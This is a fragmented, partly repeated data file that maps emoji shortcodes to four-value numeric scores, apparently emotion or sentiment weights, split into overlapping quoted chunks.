0.21600000000000003], \":convenience_store:\": [0.191,", "0.10099999999999999, 0.179, 0.132], \":smiling_face_with_sunglasses:\": [0.036000000000000004, 0.092, 0.026000000000000002, 0.09300000000000001], \":white_small_square:\": [0.276, 0.22699999999999998, 0.125, 0.161],", "[0.348, 0.41100000000000003, 0.138, 0.327], \":grinning_squinting_face:\": [0.165, 0.21600000000000003, 0.11900000000000001, 0.188], \":white_circle:\": [0.22, 0.16399999999999998, 0.121,", "0.179, 0.09300000000000001, 0.264], \":Ophiuchus:\": [0.213, 0.17, 0.233, 0.228], \":elephant:\": [0.22399999999999998, 0.23399999999999999, 0.163, 0.156],", "\":left-right_arrow:\": [0.32899999999999996, 0.37200000000000005, 0.214, 0.335], \":smiling_cat_face_with_heart-eyes:\": [0.304, 0.1, 0.319, 0.145], \":clapper_board:\": [0.213, 0.196,", "0.174], \":black_square_button:\": [0.361, 0.212, 0.235, 0.228], \":winking_face:\": [0.098, 0.053, 0.129, 0.171], \":light_bulb:\": [0.237,", "0.171, 0.302], \":warning:\": [0.264, 0.293, 0.107, 0.212], \":shortcake:\": [0.126, 0.196, 0.166, 0.08900000000000001], \":dragon_face:\":", "0.196, 0.302, 0.20199999999999999], \":old_man:\": [0.27, 0.263, 0.276, 0.215], \":calendar:\": [0.174, 0.21, 0.131, 0.225],", "[0.126, 0.059000000000000004, 0.139, 0.129], \":Aries:\": [0.214, 0.212, 0.284, 0.196], \":meat_on_bone:\": [0.177, 0.218, 0.213,", "0.125, 0.057], \":snail:\": [0.162, 0.239, 0.19899999999999998, 0.17], \":cat_face:\": [0.147, 0.185, 0.19699999999999998, 0.16699999999999998], \":panda_face:\":", "\":ring:\": [0.171, 0.073, 0.46, 0.17300000000000001], \":chequered_flag:\": [0.221, 0.184, 0.125, 0.263], \":couple_with_heart:\": [0.165, 0.113,", "0.141, 0.22699999999999998], \":spade_suit:\": [0.24600000000000002, 0.213, 0.187, 0.27899999999999997], \":performing_arts:\": [0.159, 0.10800000000000001, 0.204, 0.162], \":baby_chick:\":", "[0.19399999999999998, 0.177, 0.21600000000000003, 0.17], \":diamond_suit:\": [0.305, 0.17800000000000002, 0.226, 0.213], \":high-heeled_shoe:\": [0.278, 0.11900000000000001, 0.23199999999999998,", "0.251, 0.267, 0.18], \":rose:\": [0.129, 0.161, 0.33399999999999996, 0.19899999999999998], \":bread:\": [0.142, 0.205, 0.18100000000000002, 0.156],", "0.223, 0.335], \":hushed_face:\": [0.314, 0.355, 0.13699999999999998, 0.353], \":umbrella_with_rain_drops:\": [0.184, 0.242, 0.254, 0.37], \":herb:\":", "\":vibration_mode:\": [0.075, 0.17600000000000002, 0.083, 0.134], \":person_gesturing_OK:\": [0.155, 0.142, 0.141, 0.23], \":volcano:\": [0.207, 0.247,", "[0.171, 0.073, 0.46, 0.17300000000000001], \":chequered_flag:\": [0.221, 0.184, 0.125, 0.263], \":couple_with_heart:\": [0.165, 0.113, 0.409,", "\":koala:\": [0.11900000000000001, 0.217, 0.11599999999999999, 0.109], \":paperclip:\": [0.289, 0.21899999999999997, 0.19399999999999998, 0.231], \":outbox_tray:\": [0.204, 0.22899999999999998,", "0.27899999999999997], \":eggplant:\": [0.353, 0.23399999999999999, 0.17800000000000002, 0.165], \":shaved_ice:\": [0.213, 0.168, 0.152, 0.096], \":video_game:\": [0.138,", "0.25, 0.266], \":movie_camera:\": [0.142, 0.17800000000000002, 0.233, 0.158], \":eleven_o’clock:\": [0.12300000000000001, 0.282, 0.11900000000000001, 0.316], \":bridge_at_night:\":", "\":kissing_face_with_closed_eyes:\": [0.179, 0.08, 0.217, 0.168], \":front-facing_baby_chick:\": [0.135, 0.147, 0.152, 0.151], \":barber_pole:\": [0.135, 0.163,", "0.243], \":ice_cream:\": [0.228, 0.18899999999999997, 0.23199999999999998, 0.114], \":bento_box:\": [0.136, 0.16, 0.159, 0.212], \":woman’s_clothes:\": [0.20800000000000002,", "0.192, 0.218, 0.127], \":sparkling_heart:\": [0.217, 0.068, 0.42200000000000004, 0.163], \":heart_with_arrow:\": [0.22, 0.07400000000000001, 0.373, 0.10099999999999999],", "0.091], \":woman’s_sandal:\": [0.24600000000000002, 0.23600000000000002, 0.20800000000000002, 0.23], \":man:\": [0.243, 0.131, 0.29100000000000004, 0.098], \":ghost:\": [0.147,", "0.16, 0.295], \":double_exclamation_mark:\": [0.157, 0.125, 0.063, 0.086], \":fast_up_button:\": [0.243, 0.23600000000000002, 0.251, 0.256], \":white_medium_star:\":", "\":sunset:\": [0.065, 0.19899999999999998, 0.28600000000000003, 0.201], \":carp_streamer:\": [0.125, 0.212, 0.131, 0.095], \":smiling_face_with_smiling_eyes:\": [0.067, 0.073,", "\":dizzy:\": [0.233, 0.147, 0.359, 0.134], \":six_o’clock:\": [0.14300000000000002, 0.39299999999999996, 0.16899999999999998, 0.326], \":astonished_face:\": [0.348, 0.41100000000000003,", "0.155], \":running_shoe:\": [0.23199999999999998, 0.094, 0.08900000000000001, 0.185], \":sad_but_relieved_face:\": [0.3, 0.474, 0.145, 0.391], \":Christmas_tree:\": [0.13699999999999998,", "\":goblin:\": [0.42, 0.35, 0.149, 0.301], \":person_getting_haircut:\": [0.237, 0.215, 0.266, 0.153], \":Cancer:\": [0.209, 0.21899999999999997,", "[0.16899999999999998, 0.22, 0.354, 0.196], \":moon_viewing_ceremony:\": [0.149, 0.14300000000000002, 0.43700000000000006, 0.231], \":tropical_fish:\": [0.063, 0.271, 0.14,", "0.242, 0.254, 0.37], \":herb:\": [0.152, 0.282, 0.509, 0.138], \":guard:\": [0.19, 0.23, 0.081, 0.17600000000000002],", "0.218], \":people_with_bunny_ears:\": [0.24100000000000002, 0.11, 0.052000000000000005, 0.18], \":revolving_hearts:\": [0.2, 0.09699999999999999, 0.42700000000000005, 0.142], \":spaghetti:\": [0.055999999999999994,", "\":optical_disk:\": [0.22, 0.165, 0.332, 0.261], \":magnifying_glass_tilted_left:\": [0.222, 0.276, 0.203, 0.131], \":Sagittarius:\": [0.17, 0.217,", "[0.163, 0.242, 0.261, 0.188], \":melon:\": [0.282, 0.313, 0.262, 0.077], \":strawberry:\": [0.153, 0.198, 0.19699999999999998,", "\":waxing_gibbous_moon:\": [0.18100000000000002, 0.245, 0.327, 0.221], \":penguin:\": [0.151, 0.188, 0.134, 0.141], \":cow_face:\": [0.142, 0.222,", "0.152], \":full_moon:\": [0.17600000000000002, 0.284, 0.312, 0.20800000000000002], \":jack-o-lantern:\": [0.129, 0.327, 0.09, 0.092], \":wind_chime:\": [0.214,", "0.157], \":END_arrow:\": [0.285, 0.32, 0.23199999999999998, 0.40299999999999997], \":beaming_face_with_smiling_eyes:\": [0.091, 0.251, 0.12300000000000001, 0.079], \":new_moon:\": [0.239,", "\":Statue_of_Liberty:\": [0.09, 0.226, 0.113, 0.18600000000000003], \":black_medium_square:\": [0.445, 0.245, 0.21, 0.264], \":Capricorn:\": [0.196, 0.172,", "0.226, 0.251], \":input_numbers:\": [0.174, 0.18600000000000003, 0.21899999999999997, 0.139], \":worried_face:\": [0.349, 0.397, 0.09699999999999999, 0.348], \":foggy:\":", "\":input_numbers:\": [0.174, 0.18600000000000003, 0.21899999999999997, 0.139], \":worried_face:\": [0.349, 0.397, 0.09699999999999999, 0.348], \":foggy:\": [0.162, 0.301,", "0.034], \":gem_stone:\": [0.17300000000000001, 0.073, 0.5429999999999999, 0.10800000000000001], \":purple_heart:\": [0.183, 0.131, 0.341, 0.207], \":mobile_phone_off:\": [0.17600000000000002,", "\":boy:\": [0.171, 0.155, 0.225, 0.159], \":open_book:\": [0.196, 0.207, 0.259, 0.243], \":clockwise_vertical_arrows:\": [0.22899999999999998, 0.23399999999999999,", "0.205, 0.18100000000000002, 0.156], \":hotel:\": [0.075, 0.24600000000000002, 0.196, 0.184], \":lipstick:\": [0.276, 0.168, 0.502, 0.141],", "0.132, 0.418, 0.215], \":exclamation_question_mark:\": [0.188, 0.248, 0.085, 0.21899999999999997], \":poultry_leg:\": [0.121, 0.183, 0.215, 0.122],", "0.38299999999999995], \":upwards_button:\": [0.264, 0.261, 0.23800000000000002, 0.295], \":yellow_heart:\": [0.158, 0.177, 0.27, 0.262], \":Gemini:\": [0.228,", "\":pile_of_poo:\": [0.35, 0.342, 0.151, 0.446], \":large_blue_diamond:\": [0.249, 0.053, 0.23600000000000002, 0.278], \":Statue_of_Liberty:\": [0.09, 0.226,", "0.239], \":crystal_ball:\": [0.16899999999999998, 0.22, 0.354, 0.196], \":moon_viewing_ceremony:\": [0.149, 0.14300000000000002, 0.43700000000000006, 0.231], \":tropical_fish:\": [0.063,", "[0.21, 0.214, 0.155, 0.138], \":bear_face:\": [0.205, 0.256, 0.129, 0.196], \":keycap_10:\": [0.217, 0.109, 0.086,", "0.092], \":wind_chime:\": [0.214, 0.17600000000000002, 0.271, 0.166], \":open_hands:\": [0.203, 0.18899999999999997, 0.16699999999999998, 0.23], \":flexed_biceps:\": [0.225,", "0.11, 0.29600000000000004], \":fountain:\": [0.10099999999999999, 0.22899999999999998, 0.276, 0.292], \":seat:\": [0.155, 0.24, 0.067, 0.13699999999999998], \":reverse_button:\":", "\":computer_disk:\": [0.19399999999999998, 0.187, 0.32799999999999996, 0.22899999999999998], \":face_with_tongue:\": [0.242, 0.19, 0.142, 0.14], \":hospital:\": [0.128, 0.376,", "[0.392, 0.21100000000000002, 0.18600000000000003, 0.255], \":backhand_index_pointing_up:\": [0.259, 0.142, 0.46, 0.299], \":downwards_button:\": [0.195, 0.258, 0.182,", "0.191, 0.302], \":cooking:\": [0.078, 0.221, 0.139, 0.11800000000000001], \":slot_machine:\": [0.085, 0.16899999999999998, 0.067, 0.23], \":unlocked:\":", "\":growing_heart:\": [0.151, 0.067, 0.348, 0.13], \":smiling_face_with_heart-eyes:\": [0.307, 0.18, 0.308, 0.13699999999999998], \":kissing_face:\": [0.215, 0.171,", "0.14400000000000002], \":weary_cat_face:\": [0.251, 0.27, 0.095, 0.242], \":clinking_beer_mugs:\": [0.096, 0.10099999999999999, 0.179, 0.132], \":smiling_face_with_sunglasses:\": [0.036000000000000004,", "0.182, 0.16699999999999998], \":pot_of_food:\": [0.18, 0.149, 0.177, 0.193], \":two_o’clock:\": [0.122, 0.35, 0.191, 0.298], \":Pisces:\":", "0.214, 0.11199999999999999, 0.207], \":thumbs_up:\": [0.20199999999999999, 0.265, 0.264, 0.19399999999999998], \":woman:\": [0.24100000000000002, 0.215, 0.29, 0.142],", "[0.22, 0.165, 0.332, 0.261], \":magnifying_glass_tilted_left:\": [0.222, 0.276, 0.203, 0.131], \":Sagittarius:\": [0.17, 0.217, 0.21,", "\":pushpin:\": [0.299, 0.263, 0.136, 0.177], \":anguished_face:\": [0.309, 0.485, 0.14, 0.369], \":flushed_face:\": [0.281, 0.263,", "0.289], \":saxophone:\": [0.107, 0.16, 0.244, 0.21600000000000003], \":raising_hands:\": [0.122, 0.10099999999999999, 0.254, 0.23600000000000002], \":up_arrow:\": [0.382,", "0.16], \":basketball:\": [0.171, 0.209, 0.11800000000000001, 0.39799999999999996], \":pig_nose:\": [0.212, 0.188, 0.16699999999999998, 0.392], \":Scorpio:\": [0.185,", "0.27899999999999997], \":performing_arts:\": [0.159, 0.10800000000000001, 0.204, 0.162], \":baby_chick:\": [0.156, 0.23800000000000002, 0.125, 0.057], \":snail:\": [0.162,", "0.19699999999999998, 0.14300000000000002, 0.131], \":downcast_face_with_sweat:\": [0.321, 0.496, 0.17300000000000001, 0.447], \":custard:\": [0.16399999999999998, 0.17600000000000002, 0.158, 0.131],", "0.25, 0.214], \":grinning_face_with_sweat:\": [0.19, 0.307, 0.23199999999999998, 0.27699999999999997], \":loudly_crying_face:\": [0.24600000000000002, 0.276, 0.198, 0.272], \":hamburger:\":", "0.27, 0.095, 0.242], \":clinking_beer_mugs:\": [0.096, 0.10099999999999999, 0.179, 0.132], \":smiling_face_with_sunglasses:\": [0.036000000000000004, 0.092, 0.026000000000000002, 0.09300000000000001],", "\":speaker_high_volume:\": [0.259, 0.187, 0.154, 0.348], \":small_blue_diamond:\": [0.23, 0.18100000000000002, 0.24600000000000002, 0.23199999999999998], \":grinning_cat_face_with_smiling_eyes:\": [0.12, 0.161,", "[0.175, 0.159, 0.086, 0.245], \":ogre:\": [0.37, 0.419, 0.109, 0.257], \":chart_increasing:\": [0.22399999999999998, 0.259, 0.42700000000000005,", "0.203, 0.248], \":cat_face_with_tears_of_joy:\": [0.43799999999999994, 0.17800000000000002, 0.11599999999999999, 0.282], \":crescent_moon:\": [0.098, 0.13699999999999998, 0.287, 0.218], \":ferris_wheel:\":", "0.121, 0.237, 0.28], \":moai:\": [0.131, 0.153, 0.11800000000000001, 0.095], \":wolf_face:\": [0.185, 0.289, 0.083, 0.172],", "[0.321, 0.496, 0.17300000000000001, 0.447], \":custard:\": [0.16399999999999998, 0.17600000000000002, 0.158, 0.131], \":cocktail_glass:\": [0.032, 0.14300000000000002, 0.146,", "[0.134, 0.207, 0.222, 0.175], \":person_running:\": [0.162, 0.297, 0.062, 0.2], \":fast_down_button:\": [0.287, 0.247, 0.22,", "0.369], \":honey_pot:\": [0.177, 0.18100000000000002, 0.264, 0.14300000000000002], \":credit_card:\": [0.14400000000000002, 0.08900000000000001, 0.24100000000000002, 0.213], \":video_camera:\": [0.301,", "0.773, 0.366], \":cyclone:\": [0.16899999999999998, 0.28800000000000003, 0.177, 0.214], \":black_large_square:\": [0.396, 0.159, 0.222, 0.263], \":first_quarter_moon:\":", "0.228], \":ear:\": [0.299, 0.33, 0.316, 0.35700000000000004], \":dvd:\": [0.184, 0.14300000000000002, 0.319, 0.307], \":up-right_arrow:\": [0.19899999999999998,", "0.12], \":Leo:\": [0.24100000000000002, 0.221, 0.212, 0.24100000000000002], \":Japanese_congratulations_button:\": [0.158, 0.162, 0.255, 0.19899999999999998], \":waxing_gibbous_moon:\": [0.18100000000000002,", "[0.284, 0.385, 0.21, 0.33299999999999996], \":hourglass_done:\": [0.205, 0.305, 0.25, 0.266], \":movie_camera:\": [0.142, 0.17800000000000002, 0.233,", "0.251, 0.256], \":white_medium_star:\": [0.237, 0.175, 0.29, 0.16], \":dashing_away:\": [0.363, 0.18, 0.102, 0.16399999999999998], \":Virgo:\":", "\":carp_streamer:\": [0.125, 0.212, 0.131, 0.095], \":smiling_face_with_smiling_eyes:\": [0.067, 0.073, 0.248, 0.247], \":mount_fuji:\": [0.196, 0.225,", "0.073, 0.248, 0.247], \":mount_fuji:\": [0.196, 0.225, 0.253, 0.172], \":play_button:\": [0.168, 0.284, 0.17, 0.17800000000000002],", "\":pouting_face:\": [0.46799999999999997, 0.36200000000000004, 0.07400000000000001, 0.401], \":fish_cake_with_swirl:\": [0.10800000000000001, 0.21600000000000003, 0.355, 0.149], \":cookie:\": [0.11699999999999999, 0.18,", "0.10800000000000001], \":candy:\": [0.192, 0.184, 0.188, 0.12], \":Leo:\": [0.24100000000000002, 0.221, 0.212, 0.24100000000000002], \":Japanese_congratulations_button:\": [0.158,", "\":BACK_arrow:\": [0.075, 0.166, 0.062, 0.20199999999999999], \":winking_face_with_tongue:\": [0.126, 0.059000000000000004, 0.139, 0.129], \":Aries:\": [0.214, 0.212,", "\":chestnut:\": [0.212, 0.16699999999999998, 0.16899999999999998, 0.078], \":curry_rice:\": [0.161, 0.172, 0.175, 0.145], \":school_backpack:\": [0.127, 0.154,", "\":person_pouting:\": [0.293, 0.244, 0.196, 0.299], \":sunrise_over_mountains:\": [0.10300000000000001, 0.28, 0.392, 0.205], \":tangerine:\": [0.16899999999999998, 0.19899999999999998,", "0.215], \":calendar:\": [0.174, 0.21, 0.131, 0.225], \":frowning_face_with_open_mouth:\": [0.37, 0.423, 0.128, 0.355], \":alarm_clock:\": [0.17600000000000002,", "[0.10800000000000001, 0.092, 0.28, 0.12300000000000001], \":smirking_face:\": [0.258, 0.040999999999999995, 0.096, 0.146], \":face_screaming_in_fear:\": [0.292, 0.263, 0.133,", "0.34, 0.19899999999999998, 0.332], \":see-no-evil_monkey:\": [0.183, 0.27, 0.08900000000000001, 0.135], \":cactus:\": [0.087, 0.245, 0.192, 0.034],", "0.266, 0.131], \":part_alternation_mark:\": [0.203, 0.12300000000000001, 0.201, 0.305], \":magnifying_glass_tilted_right:\": [0.177, 0.253, 0.244, 0.12300000000000001], \":red_circle:\":", "0.295], \":yellow_heart:\": [0.158, 0.177, 0.27, 0.262], \":Gemini:\": [0.228, 0.132, 0.262, 0.177], \":hibiscus:\": [0.085,", "\":eight_o’clock:\": [0.11800000000000001, 0.341, 0.222, 0.24600000000000002], \":night_with_stars:\": [0.09, 0.174, 0.298, 0.289], \":tulip:\": [0.175, 0.245,", "[0.258, 0.040999999999999995, 0.096, 0.146], \":face_screaming_in_fear:\": [0.292, 0.263, 0.133, 0.21], \":person_gesturing_NO:\": [0.28800000000000003, 0.28800000000000003, 0.11,", "\":up-left_arrow:\": [0.193, 0.214, 0.18600000000000003, 0.124], \":joker:\": [0.233, 0.28600000000000003, 0.051, 0.177], \":dolphin:\": [0.107, 0.184,", "0.159, 0.406], \":telephone:\": [0.257, 0.204, 0.221, 0.267], \":trophy:\": [0.131, 0.19399999999999998, 0.10099999999999999, 0.27399999999999997], \":american_football:\":", "0.08], \":chart_decreasing:\": [0.28800000000000003, 0.396, 0.294, 0.38299999999999995], \":upwards_button:\": [0.264, 0.261, 0.23800000000000002, 0.295], \":yellow_heart:\": [0.158,", "0.282], \":violin:\": [0.17600000000000002, 0.139, 0.298, 0.22399999999999998], \":beating_heart:\": [0.171, 0.078, 0.32299999999999995, 0.157], \":grinning_face:\": [0.163,", "\":blue_book:\": [0.156, 0.191, 0.149, 0.193], \":headphone:\": [0.16699999999999998, 0.14800000000000002, 0.266, 0.316], \":crown:\": [0.33299999999999996, 0.11800000000000001,", "[0.268, 0.27, 0.174, 0.102], \":blowfish:\": [0.21, 0.214, 0.155, 0.138], \":bear_face:\": [0.205, 0.256, 0.129,", "0.215, 0.29, 0.142], \":two_hearts:\": [0.172, 0.08800000000000001, 0.38299999999999995, 0.142], \":dollar_banknote:\": [0.21, 0.19, 0.149, 0.192],", "[0.23, 0.242, 0.10300000000000001, 0.175], \":wedding:\": [0.092, 0.139, 0.631, 0.252], \":money_bag:\": [0.185, 0.17300000000000001, 0.14300000000000002,", "0.196, 0.23800000000000002, 0.222], \":broken_heart:\": [0.244, 0.34, 0.19899999999999998, 0.332], \":see-no-evil_monkey:\": [0.183, 0.27, 0.08900000000000001, 0.135],", "0.10800000000000001], \":purple_heart:\": [0.183, 0.131, 0.341, 0.207], \":mobile_phone_off:\": [0.17600000000000002, 0.247, 0.146, 0.245], \":up-down_arrow:\": [0.27399999999999997,", "\":collision:\": [0.16899999999999998, 0.16399999999999998, 0.048, 0.2], \":locked_with_pen:\": [0.168, 0.138, 0.19899999999999998, 0.12300000000000001], \":tired_face:\": [0.264, 0.376,", "\":ear_of_corn:\": [0.141, 0.156, 0.182, 0.16699999999999998], \":pot_of_food:\": [0.18, 0.149, 0.177, 0.193], \":two_o’clock:\": [0.122, 0.35,", "\":sun_behind_cloud:\": [0.11199999999999999, 0.27899999999999997, 0.345, 0.252], \":balloon:\": [0.042, 0.128, 0.102, 0.077], \":family:\": [0.249, 0.132,", "\":Capricorn:\": [0.196, 0.172, 0.3, 0.179], \":pool_8_ball:\": [0.257, 0.09, 0.059000000000000004, 0.204], \":no_entry:\": [0.312, 0.445,", "0.10300000000000001, 0.179], \":oden:\": [0.12300000000000001, 0.077, 0.069, 0.166], \":angry_face_with_horns:\": [0.385, 0.257, 0.03, 0.21100000000000002], \":kissing_face_with_smiling_eyes:\":", "0.081, 0.193], \":up-left_arrow:\": [0.193, 0.214, 0.18600000000000003, 0.124], \":joker:\": [0.233, 0.28600000000000003, 0.051, 0.177], \":dolphin:\":", "0.09, 0.092], \":wind_chime:\": [0.214, 0.17600000000000002, 0.271, 0.166], \":open_hands:\": [0.203, 0.18899999999999997, 0.16699999999999998, 0.23], \":flexed_biceps:\":", "0.289], \":wrench:\": [0.25, 0.313, 0.337, 0.13699999999999998], \":hear-no-evil_monkey:\": [0.303, 0.27699999999999997, 0.094, 0.28300000000000003], \":circus_tent:\": [0.113,", "0.285], \":pile_of_poo:\": [0.35, 0.342, 0.151, 0.446], \":large_blue_diamond:\": [0.249, 0.053, 0.23600000000000002, 0.278], \":Statue_of_Liberty:\": [0.09,", "0.225, 0.253, 0.172], \":play_button:\": [0.168, 0.284, 0.17, 0.17800000000000002], \":high_voltage:\": [0.252, 0.244, 0.147, 0.228],", "0.135, 0.171], \":radio_button:\": [0.218, 0.209, 0.158, 0.261], \":clipboard:\": [0.157, 0.233, 0.331, 0.21100000000000002], \":persevering_face:\":", "\":red_paper_lantern:\": [0.111, 0.235, 0.225, 0.163], \":ribbon:\": [0.20199999999999999, 0.203, 0.345, 0.193], \":link:\": [0.258, 0.217,", "\":skis:\": [0.10300000000000001, 0.077, 0.051, 0.192], \":clapping_hands:\": [0.21899999999999997, 0.256, 0.18899999999999997, 0.214], \":kiss_mark:\": [0.272, 0.10800000000000001,", "0.35700000000000004], \":dvd:\": [0.184, 0.14300000000000002, 0.319, 0.307], \":up-right_arrow:\": [0.19899999999999998, 0.22399999999999998, 0.159, 0.243], \":right_arrow_curving_up:\": [0.262,", "[0.264, 0.293, 0.107, 0.212], \":shortcake:\": [0.126, 0.196, 0.166, 0.08900000000000001], \":dragon_face:\": [0.198, 0.298, 0.205,", "\":seven_o’clock:\": [0.15, 0.35, 0.08900000000000001, 0.33], \":smiling_face_with_horns:\": [0.213, 0.055, 0.081, 0.193], \":up-left_arrow:\": [0.193, 0.214,", "0.16699999999999998], \":flashlight:\": [0.07400000000000001, 0.19699999999999998, 0.14300000000000002, 0.131], \":downcast_face_with_sweat:\": [0.321, 0.496, 0.17300000000000001, 0.447], \":custard:\": [0.16399999999999998,", "[0.126, 0.139, 0.068, 0.21100000000000002], \":cooked_rice:\": [0.203, 0.126, 0.222, 0.289], \":saxophone:\": [0.107, 0.16, 0.244,", "\":dango:\": [0.27899999999999997, 0.193, 0.139, 0.054000000000000006], \":doughnut:\": [0.152, 0.259, 0.136, 0.15], \":fire:\": [0.306, 0.225,", "0.109], \":leaf_fluttering_in_wind:\": [0.231, 0.19399999999999998, 0.382, 0.139], \":closed_mailbox_with_lowered_flag:\": [0.184, 0.19, 0.109, 0.18100000000000002], \":sleepy_face:\": [0.267,", "\":down-left_arrow:\": [0.13699999999999998, 0.171, 0.151, 0.12], \":dango:\": [0.27899999999999997, 0.193, 0.139, 0.054000000000000006], \":doughnut:\": [0.152, 0.259,", "[0.3, 0.474, 0.145, 0.391], \":Christmas_tree:\": [0.13699999999999998, 0.17, 0.285, 0.081], \":chicken:\": [0.16899999999999998, 0.192, 0.218,", "0.31, 0.3, 0.29], \":notebook:\": [0.128, 0.14400000000000002, 0.281, 0.174], \":black_square_button:\": [0.361, 0.212, 0.235, 0.228],", "0.20600000000000002, 0.17, 0.109], \":leaf_fluttering_in_wind:\": [0.231, 0.19399999999999998, 0.382, 0.139], \":closed_mailbox_with_lowered_flag:\": [0.184, 0.19, 0.109, 0.18100000000000002],", "[0.109, 0.136, 0.051, 0.179], \":left-right_arrow:\": [0.32899999999999996, 0.37200000000000005, 0.214, 0.335], \":smiling_cat_face_with_heart-eyes:\": [0.304, 0.1, 0.319,", "0.129], \":cherry_blossom:\": [0.122, 0.19699999999999998, 0.31, 0.13], \":heart_with_ribbon:\": [0.106, 0.172, 0.41700000000000004, 0.14400000000000002], \":bikini:\": [0.13,", "0.157, 0.239, 0.11599999999999999], \":maple_leaf:\": [0.27899999999999997, 0.172, 0.20800000000000002, 0.147], \":musical_keyboard:\": [0.132, 0.10800000000000001, 0.34, 0.265],", "0.27, 0.24600000000000002], \":right_arrow_curving_left:\": [0.18100000000000002, 0.292, 0.179, 0.20800000000000002], \":chocolate_bar:\": [0.147, 0.11699999999999999, 0.152, 0.10800000000000001], \":candy:\":", "[0.361, 0.099, 0.19699999999999998, 0.11199999999999999], \":down-right_arrow:\": [0.23, 0.242, 0.10300000000000001, 0.175], \":wedding:\": [0.092, 0.139, 0.631,", "\":steaming_bowl:\": [0.183, 0.129, 0.16699999999999998, 0.226], \":factory:\": [0.205, 0.306, 0.24600000000000002, 0.21], \":disappointed_face:\": [0.318, 0.467,", "0.185], \":skull:\": [0.36200000000000004, 0.267, 0.055999999999999994, 0.218], \":pill:\": [0.195, 0.253, 0.182, 0.203], \":package:\": [0.126,", "0.184], \":lipstick:\": [0.276, 0.168, 0.502, 0.141], \":smiling_face_with_halo:\": [0.10800000000000001, 0.092, 0.28, 0.12300000000000001], \":smirking_face:\": [0.258,", "0.14300000000000002], \":castle:\": [0.069, 0.20199999999999999, 0.132, 0.222], \":bookmark_tabs:\": [0.13699999999999998, 0.228, 0.301, 0.23], \":face_savoring_food:\": [0.128,", "0.10099999999999999, 0.327], \":vibration_mode:\": [0.075, 0.17600000000000002, 0.083, 0.134], \":person_gesturing_OK:\": [0.155, 0.142, 0.141, 0.23], \":volcano:\":", "0.27, 0.262], \":Gemini:\": [0.228, 0.132, 0.262, 0.177], \":hibiscus:\": [0.085, 0.218, 0.316, 0.151], \":notebook_with_decorative_cover:\":", "0.146], \":face_screaming_in_fear:\": [0.292, 0.263, 0.133, 0.21], \":person_gesturing_NO:\": [0.28800000000000003, 0.28800000000000003, 0.11, 0.29600000000000004], \":fountain:\": [0.10099999999999999,", "0.38799999999999996, 0.081, 0.128], \":Japanese_secret_button:\": [0.19699999999999998, 0.2, 0.221, 0.24], \":ATM_sign:\": [0.128, 0.179, 0.135, 0.171],", "[0.381, 0.285, 0.128, 0.111], \":rabbit_face:\": [0.165, 0.222, 0.217, 0.037000000000000005], \":pensive_face:\": [0.261, 0.40399999999999997, 0.145,", "0.205, 0.157], \":END_arrow:\": [0.285, 0.32, 0.23199999999999998, 0.40299999999999997], \":beaming_face_with_smiling_eyes:\": [0.091, 0.251, 0.12300000000000001, 0.079], \":new_moon:\":", "\":Pisces:\": [0.16899999999999998, 0.17600000000000002, 0.233, 0.239], \":soccer_ball:\": [0.147, 0.332, 0.115, 0.41100000000000003], \":Santa_Claus:\": [0.131, 0.226,", "0.094, 0.08900000000000001, 0.185], \":sad_but_relieved_face:\": [0.3, 0.474, 0.145, 0.391], \":Christmas_tree:\": [0.13699999999999998, 0.17, 0.285, 0.081],", "\":ant:\": [0.26899999999999996, 0.308, 0.098, 0.11199999999999999], \":envelope_with_arrow:\": [0.251, 0.08800000000000001, 0.063, 0.19899999999999998], \":crying_cat_face:\": [0.257, 0.264,", "\":locked:\": [0.146, 0.141, 0.196, 0.212], \":hammer:\": [0.33299999999999996, 0.42700000000000005, 0.221, 0.18600000000000003], \":confused_face:\": [0.331, 0.34299999999999997,", "\":house:\": [0.13699999999999998, 0.27399999999999997, 0.18600000000000003, 0.235], \":peach:\": [0.344, 0.204, 0.128, 0.11900000000000001], \":roller_coaster:\": [0.065, 0.133,", "\":woman’s_hat:\": [0.175, 0.17, 0.281, 0.151], \":ON!_arrow:\": [0.126, 0.139, 0.068, 0.21100000000000002], \":cooked_rice:\": [0.203, 0.126,", "0.138], \":bear_face:\": [0.205, 0.256, 0.129, 0.196], \":keycap_10:\": [0.217, 0.109, 0.086, 0.17300000000000001], \":kissing_face_with_closed_eyes:\": [0.179,", "0.182, 0.171, 0.302], \":warning:\": [0.264, 0.293, 0.107, 0.212], \":shortcake:\": [0.126, 0.196, 0.166, 0.08900000000000001],", "0.20600000000000002], \":fish:\": [0.131, 0.16699999999999998, 0.147, 0.102], \":person_wearing_turban:\": [0.212, 0.293, 0.302, 0.239], \":crystal_ball:\": [0.16899999999999998,", "[0.075, 0.17600000000000002, 0.083, 0.134], \":person_gesturing_OK:\": [0.155, 0.142, 0.141, 0.23], \":volcano:\": [0.207, 0.247, 0.141,", "0.077, 0.051, 0.192], \":clapping_hands:\": [0.21899999999999997, 0.256, 0.18899999999999997, 0.214], \":kiss_mark:\": [0.272, 0.10800000000000001, 0.273, 0.16699999999999998],", "0.22], \":bug:\": [0.268, 0.27, 0.174, 0.102], \":blowfish:\": [0.21, 0.214, 0.155, 0.138], \":bear_face:\": [0.205,", "\":woman’s_clothes:\": [0.20800000000000002, 0.154, 0.179, 0.242], \":goblin:\": [0.42, 0.35, 0.149, 0.301], \":person_getting_haircut:\": [0.237, 0.215,", "[0.11800000000000001, 0.341, 0.222, 0.24600000000000002], \":night_with_stars:\": [0.09, 0.174, 0.298, 0.289], \":tulip:\": [0.175, 0.245, 0.37,", "[0.14300000000000002, 0.39299999999999996, 0.16899999999999998, 0.326], \":astonished_face:\": [0.348, 0.41100000000000003, 0.138, 0.327], \":grinning_squinting_face:\": [0.165, 0.21600000000000003, 0.11900000000000001,", "\":videocassette:\": [0.213, 0.25, 0.312, 0.20800000000000002], \":eight_o’clock:\": [0.11800000000000001, 0.341, 0.222, 0.24600000000000002], \":night_with_stars:\": [0.09, 0.174,", "\":green_apple:\": [0.16, 0.188, 0.405, 0.102], \":bust_in_silhouette:\": [0.294, 0.34700000000000003, 0.18600000000000003, 0.27899999999999997], \":woman_dancing:\": [0.11199999999999999, 0.11599999999999999,", "\":scroll:\": [0.254, 0.267, 0.276, 0.235], \":TOP_arrow:\": [0.162, 0.185, 0.205, 0.191], \":fearful_face:\": [0.344, 0.389,", "\":gem_stone:\": [0.17300000000000001, 0.073, 0.5429999999999999, 0.10800000000000001], \":purple_heart:\": [0.183, 0.131, 0.341, 0.207], \":mobile_phone_off:\": [0.17600000000000002, 0.247,", "0.33799999999999997, 0.27, 0.24600000000000002], \":right_arrow_curving_left:\": [0.18100000000000002, 0.292, 0.179, 0.20800000000000002], \":chocolate_bar:\": 